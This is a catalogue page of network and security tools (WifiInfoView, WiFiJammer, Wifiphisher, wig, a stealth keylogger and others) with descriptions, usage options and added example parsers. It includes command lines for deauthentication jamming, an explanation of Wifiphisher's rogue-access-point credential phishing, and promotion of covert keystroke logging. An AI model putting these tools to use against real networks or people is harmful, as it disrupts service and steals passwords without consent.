WIFIINFOVIEW V1.79 - WIFI SCANNER FOR WINDOWS 7/8/VISTA

WifiInfoView scans the wireless networks in your area and displays extensive information about them, including: Network Name (SSID), MAC Address, PHY Type (802.11g or 802.11n), RSSI, Signal Quality, Frequency, Channel Number, Maximum Speed, Company Name, Router Model and Router Name (only for routers that provide this information), and more...
When you select a wireless network in the upper pane of this tool, the lower pane displays the Wi-Fi information elements received from this device, in hexadecimal format.
WifiInfoView also has a summary mode, which displays a summary of all detected wireless networks, grouped by channel number, company that manufactured the router, PHY type, or the maximum speed.
Columns In the Upper Pane

SSID: The name of the network.
MAC Address: MAC address of the router.
PHY Type: The PHY type for this network - 802.11a, 802.11g, 802.11n, or High-Rate DSSS
RSSI: The received signal strength indicator value, in units of decibels referenced to 1.0 milliwatts (dBm), as detected by the wireless LAN interface driver for the AP or peer station.
Signal Quality: A number between 0 and 100 that represents the quality of the signal.
Frequency: The channel center frequency of the band on which the 802.11 Beacon or Probe Response frame was received. The value of this column is in units of Gigahertz (GHz).
Channel: Channel number used by this wireless network.
Information Size: The total size (in bytes) of all Wi-Fi information elements received from this wireless network.
Elements Count: The total number of Wi-Fi information elements received from this wireless network.
Company: The company that manufactured the router, according to the first 3 bytes of the MAC address.
Router Model: The model of the router. This value is displayed only for routers that provide this information inside the Wi-Fi information elements.
Router Name: The name of the router. This value is displayed only for routers that provide this information inside the Wi-Fi information elements.
Security: Specifies whether the network is secured (Yes/No).
Maximum Speed: The maximum speed (in Mbps) that you can get when connecting to this wireless network.
First Detection: The first date/time that this network was detected.
Last Detection: The last date/time that this network was detected.
Detection Count: The number of times that this network was detected.
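
The information elements the lower pane shows in hexadecimal are a plain TLV list (1-byte element ID, 1-byte length, value), and several of the columns above are derived from them. The decoder below is an added example, not WifiInfoView's code: the beacon IEs, the BSSID and the tiny OUI table are constructed for the demonstration, and it reads only the legacy rate sets, so 802.11n/ac rates carried in the HT/VHT elements are not reflected in Maximum Speed.

```python
"""Decode 802.11 information elements (IEs) into the columns WifiInfoView's
upper pane derives from them: SSID, Channel, Security, WPS, Maximum Speed,
Company, Information Size and Elements Count. Added example; all input is
constructed, not captured from a real network."""

# Element IDs from IEEE 802.11-2012, Table 8-54.
EID_SSID = 0
EID_SUPPORTED_RATES = 1
EID_DS_PARAM = 3              # carries the current channel number
EID_RSN = 48                  # present on WPA2 (802.11i) networks
EID_EXT_SUPPORTED_RATES = 50
EID_VENDOR = 221
WPS_OUI_TYPE = bytes.fromhex("0050f204")   # Microsoft OUI 00-50-F2, type 4 = WPS

# Constructed OUI table (first 3 bytes of the MAC -> vendor); a real scanner
# uses the IEEE OUI registry.
OUI_TABLE = {"00:1a:2b": "ExampleRouter Inc.", "00:50:f2": "Microsoft"}


def parse_ies(data):
    """Walk the TLV list and return [(element_id, value_bytes), ...].
    A trailing element whose declared length runs past the buffer is dropped
    instead of being parsed from garbage; malformed beacons are common."""
    ies, i = [], 0
    while i + 2 <= len(data):
        eid, length = data[i], data[i + 1]
        value = data[i + 2:i + 2 + length]
        if len(value) != length:
            break
        ies.append((eid, value))
        i += 2 + length
    return ies


def summarize(bssid, ies_hex):
    """Derive the upper-pane columns for one network from its BSSID and the
    hex dump of its information elements."""
    raw = bytes.fromhex(ies_hex)
    ies = parse_ies(raw)
    info = {
        "MAC Address": bssid,
        "Company": OUI_TABLE.get(bssid[:8].lower(), "unknown"),
        "Information Size": len(raw),   # bytes of all IEs, as the column defines it
        "Elements Count": len(ies),
        "SSID": "",
        "Channel": None,
        "Security": "No",
        "WPS": "No",
        "Maximum Speed": 0.0,
    }
    rates = []
    for eid, value in ies:
        if eid == EID_SSID:
            info["SSID"] = value.decode("utf-8", "replace")
        elif eid in (EID_SUPPORTED_RATES, EID_EXT_SUPPORTED_RATES):
            # One byte per rate in 500 kbit/s units; bit 7 flags a basic rate.
            rates.extend((b & 0x7F) * 0.5 for b in value)
        elif eid == EID_DS_PARAM and len(value) == 1:
            info["Channel"] = value[0]
        elif eid == EID_RSN:
            info["Security"] = "Yes"
        elif eid == EID_VENDOR and value.startswith(WPS_OUI_TYPE):
            info["WPS"] = "Yes"
    if rates:
        info["Maximum Speed"] = max(rates)   # Mbps, legacy rate sets only
    return info


# Constructed beacon IEs: SSID "guest", 802.11g rate sets, channel 6,
# an RSN element (CCMP group/pairwise cipher, PSK) and a WPS vendor element.
SAMPLE_BSSID = "00:1A:2B:CC:DD:EE"
SAMPLE_IES_HEX = (
    "00056775657374"                                # SSID "guest"
    "010882848b960c121824"                          # rates 1,2,5.5,11,6,9,12,18
    "030106"                                        # DS parameter set: channel 6
    "32043048606c"                                  # extended rates 24,36,48,54
    "30140100000fac040100000fac040100000fac020000"  # RSN: version 1, CCMP, PSK
    "dd040050f204"                                  # vendor specific: WPS
)

if __name__ == "__main__":
    for column, value in summarize(SAMPLE_BSSID, SAMPLE_IES_HEX).items():
        print(f"{column:17} {value}")
```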

Command-Line Options

/cfg <Filename>
    Start WifiInfoView with the specified configuration file. For example:
    WifiInfoView.exe /cfg "c:\config\csv.cfg"
    WifiInfoView.exe /cfg "%AppData%\WifiInfoView.cfg"

/NumberOfScans <Number>
    Specifies the number of scans to perform when using the save command-line options (/scomma, /shtml, and so on...)

/stext <Filename>
    Save the list of wireless networks into a regular text file.

/stab <Filename>
    Save the list of wireless networks into a tab-delimited text file.

/scomma <Filename>
    Save the list of wireless networks into a comma-delimited text file (csv).

/stabular <Filename>
    Save the list of wireless networks into a tabular text file.

/shtml <Filename>
    Save the list of wireless networks into an HTML file (Horizontal).

/sverhtml <Filename>
    Save the list of wireless networks into an HTML file (Vertical).

/sxml <Filename>
    Save the list of wireless networks into an XML file.

/sort <column>
    This command-line option can be used with other save options for sorting by the desired column. If you don't specify this option, the list is sorted according to the last sort that you made from the user interface. The <column> parameter can specify the column index (0 for the first column, 1 for the second column, and so on) or the name of the column, like "SSID" and "RSSI". You can specify the '~' prefix character (e.g: "~SSID") if you want to sort in descending order. You can put multiple /sort in the command-line if you want to sort by multiple columns. Examples:
    WifiInfoView.exe /shtml "d:\temp\wifi.html" /sort 2 /sort ~1
    WifiInfoView.exe /scomma "d:\temp\wifi.html" /sort "~Security" /sort "SSID"

/nosort
    When you specify this command-line option, the list will be saved without any sorting.

/UseOnlyAdapter <0 | 1>
    Specifies whether to use only the desired network adapter. 0 = No, 1 = Yes.

/NetworkAdapter <Adapter Guid>
    Specifies the guid of the network adapter to use, for example:
    WifiInfoView.exe /UseOnlyAdapter 1 /NetworkAdapter "{F261051F-D217-12D0-B9A9-F61D323AD21E}"

/SortOnEveryUpdate <0 | 1>
    Specifies whether to sort on every update. 0 = No, 1 = Yes.

/MacAddressFormat <1 - 3>
    Specifies the MAC address format. 1 = XX-XX-XX-XX-XX-XX, 2 = XX:XX:XX:XX:XX:XX, 3 = XXXXXXXXXXXX.

/DisplayMode <1 - 11>
    Specifies the display mode:
    1 - Full Details Mode
    2 - Channels Summary Mode
    3 - Companies Summary Mode
    4 - PHY Types Summary Mode
    5 - Max Speed Summary Mode
    6 - Router Model Summary Mode
    7 - Router Name Summary Mode
    8 - Signal Quality Summary Mode
    9 - BSS Type Summary Mode
    10 - Security Summary Mode
    11 - WPS Summary Mode

/UpdateRate <1 - 4>
    Specifies the update rate: 1 - Low, 2 - Medium, 3 - High, 4 - Very High.

Download WifiInfoView v1.79
WIFIJAMMER - CONTINUOUSLY JAM ALL WIFI CLIENTS/
ROUTERS

Continuously jam all wifi clients and access points within range.
The effectiveness of this script is constrained by your wireless
card. Alfa cards seem to effectively jam within about a block
radius with heavy access point saturation. Granularity is given
in the options for more effective targeting.
Requires: python 2.7, python-scapy, a wireless card capable of
injection

Usage
Simple
python wifijammer.py

This will find the most powerful wireless interface and turn on monitor mode. If a monitor mode interface is already up it will use the first one it finds instead. It will then start sequentially hopping channels 1 per second from channel 1 to 11 identifying all access points and clients connected to those access points. On the first pass through all the wireless channels it is only identifying targets. After that the 1sec per channel time limit is eliminated and channels are hopped as soon as the deauth packets finish sending. Note that it will still add clients and APs as it finds them after the first pass through.
Upon hopping to a new channel it will identify targets that are on that channel and send 1 deauth packet to the client from the AP, 1 deauth to the AP from the client, and 1 deauth to the AP destined for the broadcast address to deauth all clients connected to the AP. Many APs ignore deauths to broadcast addresses.
python wifijammer.py -a 00:0E:DA:DE:24:8E -c 2

Deauthenticate all devices with which 00:0E:DA:DE:24:8E communicates and skip channel hopping by setting the channel to the target AP's channel (2 in this case). This would mainly be an access point's MAC so all clients associated with that AP would be deauthenticated, but you can also put a client MAC here to target that one client and any other devices that communicate with it.
Advanced
python wifijammer.py -c 1 -p 5 -t .00001 -s DL:3D:8D:JJ:39:52 -d --world

-c, Set the monitor mode interface to only listen and deauth clients or APs on channel 1
-p, Send 5 packets to the client from the AP and 5 packets to the AP from the client along with 5 packets to the broadcast address of the AP
-t, Set a time interval of .00001 seconds between sending each deauth (try this if you get a scapy error like 'no buffer space')
-s, Do not deauth the MAC DL:3D:8D:JJ:39:52. Ignoring a certain MAC address is handy in case you want to tempt people to join your access point in cases of wanting to use LANs.py or a Pineapple on them.
-d, Do not send deauths to access points' broadcast address; this will speed up the deauths to the clients that are found
--world, Set the max channel to 13. In N. America the max channel standard is 11, but the rest of the world uses 13 channels so use this option if you're not in N. America
Walking/driving around
python wifijammer.py -m 10

The -m option sets a max number of client/AP combos that the script will attempt to deauth. When the max number is reached, it clears and repopulates its list based on what traffic it sniffs in the area. This allows you to constantly update the deauth list with client/AP combos who have the strongest signal in case you were not stationary. If you want to set a max and not have the deauth list clear itself when the max is hit, just add the -n option like: -m 10 -n
All options:
python wifijammer.py [-a AP MAC] [-c CHANNEL] [-d] [-i INTERFACE] [-m MAXIMUM] [-n] [-p PACKETS] [-s SKIP] [-t TIME INTERVAL]

Download WiFiJammer
WIFIPHISHER - FAST AUTOMATED PHISHING ATTACKS
AGAINST WIFI NETWORKS

Wifiphisher is a security tool that mounts fast automated phishing attacks against WiFi networks in order to obtain secret passphrases and other credentials. It is a social engineering attack that, unlike other methods, does not include any brute forcing. It is an easy way for obtaining credentials from captive portals and third party login pages or WPA/WPA2 secret passphrases.
Wifiphisher works on Kali Linux and is licensed under the MIT license.
From the victim's perspective, the attack takes place in three phases:
1. Victim is being deauthenticated from her access point. Wifiphisher continuously jams all of the target access point's wifi devices within range by sending deauth packets to the client from the access point, to the access point from the client, and to the broadcast address as well.
2. Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point's settings. It then creates a rogue wireless access point that is modeled on the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will start connecting to the rogue access point. After this phase, the victim is MiTMed.
3. Victim is being served a realistic router config-looking page. wifiphisher employs a minimal web server that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for credentials, for example one that asks for WPA password confirmation due to a router firmware upgrade.
Usage

Short form  Long form           Explanation
-m          --maximum           Choose the maximum number of clients to deauth. List of clients will be emptied and repopulated after hitting the limit. Example: -m 5
-n          --noupdate          Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n
-t          --timeinterval      Choose the time interval between packets being sent. Default is as fast as possible. If you see scapy errors like 'no buffer space' try: -t .00001
-p          --packets           Choose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -p 2
-d          --directedonly      Skip the deauthentication packets to the broadcast address of the access points and only send them to client/AP pairs
-a          --accesspoint       Enter the MAC address of a specific access point to target
-jI         --jamminginterface  Choose the interface for jamming. By default script will find the most powerful interface and starts monitor mode on it.
-aI         --apinterface       Choose the interface for the fake AP. By default script will find the second most powerful interface and starts monitor mode on it.

Screenshots

Targeting an access point

A successful attack

Fake router configuration page

Requirements

Kali Linux.
Two wireless network interfaces, one capable of injection.

Download WiFiPhisher
WIFRESTI - FIND YOUR WIRELESS NETWORK PASSWORD FROM WINDOWS, LINUX AND MAC OS

Find your wireless network password from Windows, Linux and Mac OS.
Wifresti is a simple Wi-Fi password recovery tool, compatible with Windows and Unix systems (Linux, Mac OS).
Features

Recover Wifi password on Windows
Recover Wifi password on Unix

Requirements

An operating system (tested on Ubuntu, Windows 10, 8, 7)
Python 2.7

Installation
sudo su
git clone https://github.com/LionSec/wifresti.git && cp wifresti/wifresti.py /usr/bin/wifresti && chmod +x /usr/bin/wifresti
sudo wifresti

Download Wifresti
WIG - WEBAPP INFORMATION GATHERER

wig is a web application information gathering tool, which can identify numerous Content Management Systems and other administrative applications.
The application fingerprinting is based on checksums and string matching of known files for different versions of CMSes. This results in a score being calculated for each detected CMS and its versions. Each detected CMS is displayed along with the most probable version(s) of it. The score calculation is based on weights and the amount of "hits" for a given checksum.
wig also tries to guess the operating system on the server based on the 'server' and 'x-powered-by' headers. A database containing known header values for different operating systems is included in wig, which allows wig to guess Microsoft Windows versions and Linux distribution and version.
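The weighted scoring and the header lookup described above, worked through as an added example (not wig's own code) over a constructed fingerprint table and a constructed header table; md5 is assumed as the checksum. It shows why a single version-unique file such as a world-readable CHANGELOG.txt settles the version while files shared across releases only narrow it, which is also what a site owner should restrict first.

```python
"""Weighted fingerprint scoring of the kind wig's description outlines: known
(path, checksum) pairs map to CMS versions, every hit adds weight to each
version shipping that file, and the versions with the top score are reported.
Added example, not wig's code; fingerprint and header tables are constructed."""
import hashlib
from collections import defaultdict


def md5_hex(content):
    """Checksum of a fetched file body, as fingerprint databases store it."""
    return hashlib.md5(content.encode()).hexdigest()


# Constructed fingerprint database: (path, md5) -> (cms, versions shipping
# exactly that file). The real database holds tens of thousands of entries.
FINGERPRINTS = {
    ("/CHANGELOG.txt", md5_hex("Drupal 7.32, 2014-10-15")):
        ("Drupal", ["7.32"]),
    ("/misc/drupal.js", md5_hex("drupal.js shared by 7.28-7.32")):
        ("Drupal", ["7.28", "7.29", "7.30", "7.31", "7.32"]),
    ("/misc/ajax.js", md5_hex("ajax.js changed in 7.31")):
        ("Drupal", ["7.31", "7.32"]),
    ("/wp-includes/js/wp-emoji.js", md5_hex("wp-emoji 4.2")):
        ("WordPress", ["4.2", "4.2.1"]),
}

# Constructed header database: header value -> operating system guess.
OS_BY_HEADER = {
    "Microsoft-IIS/7.5": "Microsoft Windows Server 2008 R2",
    "Apache/2.4.7 (Ubuntu)": "Ubuntu 14.04",
}


def score_versions(responses):
    """responses: {path: body}. Returns {cms: {version: score}}.
    A checksum that only one version ships is strong evidence, so each hit is
    worth 1 / (number of versions matching that checksum)."""
    scores = defaultdict(lambda: defaultdict(float))
    for path, body in responses.items():
        hit = FINGERPRINTS.get((path, md5_hex(body)))
        if hit is None:          # unknown hash (404 page, modified file): no evidence
            continue
        cms, versions = hit
        weight = 1.0 / len(versions)
        for version in versions:
            scores[cms][version] += weight
    return scores


def most_probable(scores):
    """Per CMS, the version(s) tied at the highest score, as wig prints them."""
    result = {}
    for cms, per_version in scores.items():
        top = max(per_version.values())
        result[cms] = sorted(v for v, s in per_version.items() if abs(s - top) < 1e-9)
    return result


def guess_os(headers):
    """Look up the 'server' and 'x-powered-by' header values in the OS table."""
    for name in ("server", "x-powered-by"):
        guess = OS_BY_HEADER.get(headers.get(name, ""))
        if guess:
            return guess
    return None


# Constructed responses from one site: three Drupal files and a 404 body for a
# WordPress path, whose hash matches nothing in the database.
SAMPLE_RESPONSES = {
    "/CHANGELOG.txt": "Drupal 7.32, 2014-10-15",
    "/misc/drupal.js": "drupal.js shared by 7.28-7.32",
    "/misc/ajax.js": "ajax.js changed in 7.31",
    "/wp-includes/js/wp-emoji.js": "<html>404 Not Found</html>",
}
SAMPLE_HEADERS = {"server": "Microsoft-IIS/7.5", "x-powered-by": "ASP.NET"}

if __name__ == "__main__":
    scores = score_versions(SAMPLE_RESPONSES)
    for cms, per_version in scores.items():
        print(cms, dict(per_version))
    print("most probable:", most_probable(scores))
    print("os guess:", guess_os(SAMPLE_HEADERS))
```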
wig features:

CMS version detection by: check sums, string matching and extraction
Lists detected package and platform versions such as asp.net, php, openssl, apache
Detects JavaScript libraries
Operating system fingerprinting by matching php, apache and other packages against values in wig's database
Checks for files of interest such as administrative login pages, readmes, etc
Currently wig's databases include 28,000 fingerprints
Reuse information from previous runs (save the cache)
Implement a verbose option
Remove dependency on 'requests'
Support for proxy
Proper threading support
Included check for known vulnerabilities

Requirements

wig is built with Python 3, and is therefore not compatible with Python 2.
How it works

The default behavior of wig is to identify a CMS, and exit after version detection of the CMS. This is done to limit the amount of traffic sent to the target server. This behavior can be overwritten by setting the '-a' flag, in which case wig will test all the known fingerprints. As some configurations of applications do not use the default location for files and resources, it is possible to have wig fetch all the static resources it encounters during its scan. This is done with the '-c' option. The '-m' option tests all fingerprints against all fetched URLs, which is helpful if the default location has been changed.
Help Screen
usage: wig.py [-h] [-l INPUT_FILE] [-n STOP_AFTER] [-a] [-m] [-u]
              [--no_cache_load] [--no_cache_save] [-N] [--verbosity]
              [--proxy PROXY] [-w OUTPUT_FILE]
              [url]

WebApp Information Gatherer

positional arguments:
  url                  The url to scan e.g. http://example.com

optional arguments:
  -h, --help           show this help message and exit
  -l INPUT_FILE        File with urls, one per line.
  -n STOP_AFTER        Stop after this amount of CMSs have been detected. Default: 1
  -a                   Do not stop after the first CMS is detected
  -m                   Try harder to find a match without making more requests
  -u                   User-agent to use in the requests
  --no_cache_load      Do not load cached responses
  --no_cache_save      Do not save the cache for later use
  -N                   Shortcut for --no_cache_load and --no_cache_save
  --verbosity, -v      Increase verbosity. Use multiple times for more info
  --proxy PROXY        Tunnel through a proxy (format: localhost:8080)
  -w OUTPUT_FILE       File to dump results into (JSON)
Example of run:
$ ./wig.py example.com
WebApp Information Gatherer


Redirected to http://www.example.com. Continue? [Y|n]:

TITLE
--- HTML TITLE ---

IP
255.255.255.256

SOFTWARE                  VERSION                            CATEGORY
Drupal                    7.28 | 7.29 | 7.30 | 7.31 | 7.32   CMS
ASP.NET                   4.0.30319.18067                    Platform
Microsoft-HTTPAPI         2.0                                Platform
Microsoft-IIS             6.0 | 7.0 | 7.5 | 8.0              Platform
Microsoft Windows Server  2003 SP2 | 2008 | 2008 R2 | 2012   Operating System

SOFTWARE                  VULNERABILITIES   LINK
Drupal 7.28                                 http://cvedetails.com/version/169265
Drupal 7.29                                 http://cvedetails.com/version/169917
Drupal 7.30                                 http://cvedetails.com/version/169916

URL                       NOTE                     CATEGORY
/login/                   Test directory           Interesting URL
/login/index_form.html    ASP.NET detailed error   Interesting URL
/robots.txt               robots.txt index         Interesting URL
/test/                    Test directory           Interesting URL
________________________________________________________________________________
Time: 15.7 sec   Urls: 351   Fingerprints: 28989

Download wig
WINDOWS SPY KEYLOGGER - SOFTWARE TO LOG
KEYSTROKES IN STEALTH MODE FOR 32-BIT/64-BIT
PROCESSES ON WINDOWS XP/VISTA/7/8/10

Windows Spy Keylogger is the free software to help you covertly monitor all activities on your computer.
It intercepts everything that is typed on the keyboard and stores it into one log file which you can view anytime later. You can track logins, passwords, emails, chats and all other secret things typed by the user.
You can also customize various options including stealth mode, run at startup, logfile etc. It is very simple to use with just a click of a button.
One of the unique features of this tool is that you can install it and run it on any computer without administrator permissions. Also it works on both 32-bit & 64-bit Windows platforms seamlessly.
It is suitable for parents who want to monitor activities of their children. Also cyber crime investigators, penetration testers and forensic analysts will find it very handy in their work.
Windows Spy Keylogger works on all platforms starting from Windows XP to the new Windows 10 version.
Features

Free Tool to Monitor Keystrokes in stealth manner
Monitor both 32-bit & 64-bit applications
Automatically run at Startup
No need for administrator privileges
Settings dialog to change various options
Stores keyboard activities silently to a log file
Very easy to use with just a click of a button
Displays current status of key logger at any time
Includes Installer for local installation & un-installation

How to Use?

'Windows Spy Keylogger' is a very easy to use tool with its cool GUI interface.
Here are the simple steps:
Run 'Windows Spy Keylogger' on your system
It will show you the current status of Keylogger as seen in the screenshots below.
Now you can just click on the button below to Start or Stop Keylogger
That's all :)
Also you can customize various options (run at startup, log path, version check etc) using the 'Settings Dialog' by clicking on the button at the bottom right corner.

Download Windows Spy Keylogger


WIRELESS NETWORK WATCHER V1.79 - SHOW WHO IS
CONNECTED TO YOUR WIRELESS NETWORK

Wireless Network Watcher is a small utility that scans your wireless network and displays the list of all computers and devices that are currently connected to your network.
For every computer or device that is connected to your network, the following information is displayed: IP address, MAC address, the company that manufactured the network card, and optionally the computer name.
You can also export the connected devices list into html/xml/csv/text file, or copy the list to the clipboard and then paste into Excel or other spreadsheet application.
Using Wireless Network Watcher

Wireless Network Watcher doesn't require any installation process or additional dll files. In order to start using it, simply extract the executable file (WNetWatcher.exe) from the zip file, and run it.
If you want, you can also download WNetWatcher with full install/uninstall support (wnetwatcher_setup.exe), so a shortcut for running WNetWatcher will be automatically added into your start menu.
After running WNetWatcher, it automatically locates your wireless adapter, and scans your network. After a few seconds, you should start seeing the list of computers that are currently connected to your network.
If for some reason WNetWatcher failed to locate and scan your network, you can try manually choosing the correct network adapter, by pressing F9 (Advanced Options) and choosing the right network adapter.
Columns Description

IP Address: IP Address of the device or computer.
Device Name: The name of the device or computer. This field may remain empty if the computer or the device doesn't provide its name.
MAC Address: The MAC address of the network adapter.
Network Adapter Company: The company that manufactured the network adapter, according to the MAC Address. This column can help you to detect the type of the device or computer. For example, if the company name is Apple, the device is probably a Mac computer, iPhone, or iPad; if the company name is Nokia, the device is probably a Nokia cellular phone. By default, this utility uses an internal MAC addresses database stored inside the .exe file, but it's not always updated with the latest MAC address assignments. You can manually download the latest MAC addresses file from http://standards.ieee.org/develop/regauth/oui/oui.txt and then put oui.txt in the same folder where WNetWatcher.exe is located. When you run WNetWatcher.exe, it'll automatically load and use the external oui.txt instead of the internal MAC addresses database.
Device Information: This column displays 'Your Computer' if the device is the computer that you currently use. This column displays 'Your Router' if the device is the wireless router.
User Text: You can assign your own text to any device detected by WNetWatcher. By default, this field is filled with the device name. In order to change the User Text, simply double-click the item and type the desired text.
Active: Specifies whether this device is currently active. When a device is not detected anymore, the 'Active' value is turned from 'Yes' to 'No'.

Background Scan

Starting from version 1.15, there is a new option under the Options menu - 'Background Scan'.
When it's turned on, Wireless Network Watcher first makes the regular fast network scan to discover all currently connected devices. After that, a continuous background scan is activated to discover when new devices are connected to your network. The background scan is slower and less intensive than the regular scan, so it won't overload your computer and you can leave it to run in the background while using other programs.
When the background scan is running, a counter of the scan process is displayed in the second section of the bottom status bar.
When the background scan is used, you can use the 'Beep On New Device' option to get a beep sound when a new device is detected.
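The OUI lookup behind the 'Network Adapter Company' column and the new-device condition behind 'Beep On New Device', as an added example that is not part of Wireless Network Watcher: a parser for the oui.txt layout, a lookup that also recognizes locally administered (randomized) addresses for which no manufacturer can be named, and a comparison against a saved baseline. The oui.txt excerpt and scan rows are constructed; only the 00-00-0C prefix is a real assignment.

```python
import re

# Constructed excerpt in the layout of the IEEE oui.txt registry (example data, not the
# real file): only the "(hex)" lines carry an assignment; "(base 16)" and address lines
# are skipped. 00-00-0C is Cisco's well-known prefix, the other entry is made up.
OUI_TEXT = """\
00-00-0C   (hex)\t\tCISCO SYSTEMS, INC.
00000C     (base 16)\t\tCISCO SYSTEMS, INC.
\t\t\t\tEXAMPLE STREET 1
\t\t\t\tUS

A8-BB-CC   (hex)\t\tExample Phone Maker
A8BBCC     (base 16)\t\tExample Phone Maker
"""

HEX_LINE = re.compile(
    r"^([0-9A-Fa-f]{2})-([0-9A-Fa-f]{2})-([0-9A-Fa-f]{2})\s+\(hex\)\s+(.+?)\s*$"
)


def parse_oui(text):
    """Build {6-hex-digit prefix: vendor} from oui.txt-formatted text."""
    table = {}
    for line in text.splitlines():
        m = HEX_LINE.match(line)
        if m:
            table["".join(m.group(1, 2, 3)).upper()] = m.group(4)
    return table


def normalize_mac(mac):
    """Accept 00:00:0c:..., 00-00-0C-... or 00000c... and return 12 upper-case hex digits."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", mac).upper()
    if len(digits) != 12:
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    return digits


def is_locally_administered(mac):
    """Bit 1 of the first octet set means the address was assigned locally (for example a
    phone's randomized Wi-Fi address), so its prefix says nothing about the manufacturer."""
    return bool(int(normalize_mac(mac)[:2], 16) & 0x02)


def describe_vendor(table, mac):
    """Vendor name for a MAC, or the reason why none can be given."""
    if is_locally_administered(mac):
        return "locally administered address (randomized); no vendor"
    return table.get(normalize_mac(mac)[:6], "unknown prefix; update oui.txt")


def new_devices(baseline_macs, scan_rows):
    """Rows of the current scan whose MAC was not in the saved baseline, the condition
    behind the 'Beep On New Device' option. scan_rows are (ip, mac, name) tuples."""
    known = {normalize_mac(m) for m in baseline_macs}
    return [row for row in scan_rows if normalize_mac(row[1]) not in known]


OUI_TABLE = parse_oui(OUI_TEXT)

# Constructed scan results and a previously saved baseline of known MACs.
BASELINE = ["00:00:0c:11:22:33", "a8:bb:cc:00:00:01"]
SCAN = [
    ("192.168.1.1", "00:00:0c:11:22:33", "router"),
    ("192.168.1.20", "a8:bb:cc:00:00:01", "phone"),
    ("192.168.1.57", "da:1f:00:9a:bc:de", ""),   # randomized MAC, first seen in this scan
]

if __name__ == "__main__":
    for ip, mac, name in SCAN:
        print(f"{ip:<14} {mac}  {name or '-':<8} {describe_vendor(OUI_TABLE, mac)}")
    for ip, mac, _ in new_devices(BASELINE, SCAN):
        print(f"NEW DEVICE: {ip} {mac}")
```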
Command-Line Options

/cfg <Filename>        Start Wireless Network Watcher with the specified configuration file. For example:
                       WNetWatcher.exe /cfg "c:\config\wnw.cfg"
                       WNetWatcher.exe /cfg "%AppData%\WNetWatcher.cfg"
/stext <Filename>      Scan your network, and save the network devices list into a regular text file.
/stab <Filename>       Scan your network, and save the network devices list into a tab-delimited text file.
/scomma <Filename>     Scan your network, and save the network devices list into a comma-delimited text file (csv).
/stabular <Filename>   Scan your network, and save the network devices list into a tabular text file.
/shtml <Filename>      Scan your network, and save the network devices list into HTML file (Horizontal).
/sverhtml <Filename>   Scan your network, and save the network devices list into HTML file (Vertical).
/sxml <Filename>       Scan your network, and save the network devices list into XML file.

Download Wireless Network Watcher v1.79


WIRELESS NETWORK WATCHER V1.81 - SHOW WHO IS
CONNECTED TO YOUR WIRELESS NETWORK

Download Wireless Network Watcher v1.81


WIRESHARK V2.0 - THE WORLD'S FOREMOST NETWORK
PROTOCOL ANALYZER

Wireshark is the world's foremost network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions.
Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.

Wireshark 2.0.0rc2 has been released. This is the second release candidate for Wireshark 2.0. Installers for Windows, OS X, and source code are now available.
The following features are new (or have been significantly updated) since version 2.0.0rc1:
For new installations on UN*X, the directory for user preferences is $HOME/.config/wireshark rather than $HOME/.wireshark. If that directory is absent, preferences will still be found and stored under $HOME/.wireshark.
Qt port:
The SIP Statistics dialog has been added.
You can now create filter expressions from the display filter toolbar.
Bugs in the UAT preferences dialog have been fixed.
Several dissector and Qt UI crash bugs have been fixed.
Problems with the Mac OS X application bundle have been fixed.
The following features are new (or have been significantly updated) since version 1.99.9:
Qt port:
The LTE RLC Graph dialog has been added.
The LTE MAC Statistics dialog has been added.
The LTE RLC Statistics dialog has been added.
The IAX2 Analysis dialog has been added.
The Conversation Hash Tables dialog has been added.
The Dissector Tables dialog has been added.
The Supported Protocols dialog has been added.
You can now zoom the I/O and TCP Stream graph X and Y axes independently.
The RTP Player dialog has been added.
Several memory leaks have been fixed.

Changes in Wireshark 2.0

Capture options. Capture options have been simplified and consolidated. In 1.12 they are spread out in many places across several windows. In 2.0 they are in two places: the Capture Options dialog (Capture > Options or the gear icon in the toolbar) and the Manage Interfaces dialog, which you can open by pressing Manage Interfaces in the Capture Options dialog.
Streamlined preferences. Preferences windows usually aren't something to get excited about and this is no exception, but it's important to note that in the process of removing clutter some preferences have been removed from the main window. They're still available in the Advanced preference section which lists every available preference item.
Translations. Thanks to the hard work of many contributors the new interface supports multiple languages. You can now select between Chinese, English, French, German, Italian, Japanese, and Polish in the Appearance preferences section. Many more translations are underway. You can see the status of the translation efforts and help out with the effort at https://www.transifex.com/wireshark/wireshark/.
Related packets. As you scroll through the packet list you might notice little symbols pop up along its left edge. For example, you might see left and right arrows for DNS requests and replies, or a check mark to denote an ACKed TCP packet. These are related packets. This exposes some plumbing we've had in place for a long time, but it's now shown in the main window instead of buried deep in the packet detail tree.
Intelligent scrollbar. As you scroll through the packet list you might notice that the scroll bar itself looks odd. It now features a map of nearby packets, similar to the minimap available in many modern text editors. The number of packets shown in the map is the same as the number of physical vertical pixels in your scrollbar. The more pixels you have, the more packets you can see. In other words, if you use Wireshark regularly you now have a legitimate business case for a retina display.
Statistics dialogs. The dialogs under the Statistics and Telephony menus have seen many improvements. The backend code has been consolidated so that most of Wireshark's statistics now share common internal logic. This in turn let us create common UI code with many workflow improvements and a much more consistent interface.
I/O Graph dialog. You can now graph as many items as you like and save graphs as PDF, PNG, JPEG, and BMP. Graph settings stay with your profile so you can customize them for multiple environments.
Follow Stream dialog. You can now switch between streams and search for text.
General dialogs. Many dialogs now have context-aware hints. For example the I/O Graph and Follow Stream dialogs will tell you which packet corresponds to the graph or stream data under your cursor. Most of them will stay open after you close a capture file so that you can compare statistics or graphs between captures.

Download Wireshark v2.0.0
WOODPECKER HASH BRUTEFORCE - MULTITHREADED
PROGRAM TO PERFORM A BRUTE-FORCE ATTACK
AGAINST A HASH

Woodpecker hash Bruteforce is a fast and easy-to-use multithreaded program to perform a brute-force attack against a hash. It supports many common hashing algorithms such as md5, sha1, etc. It runs on Windows and Mac OS. You can use dictionary, alphabet-based or random bruteforce.
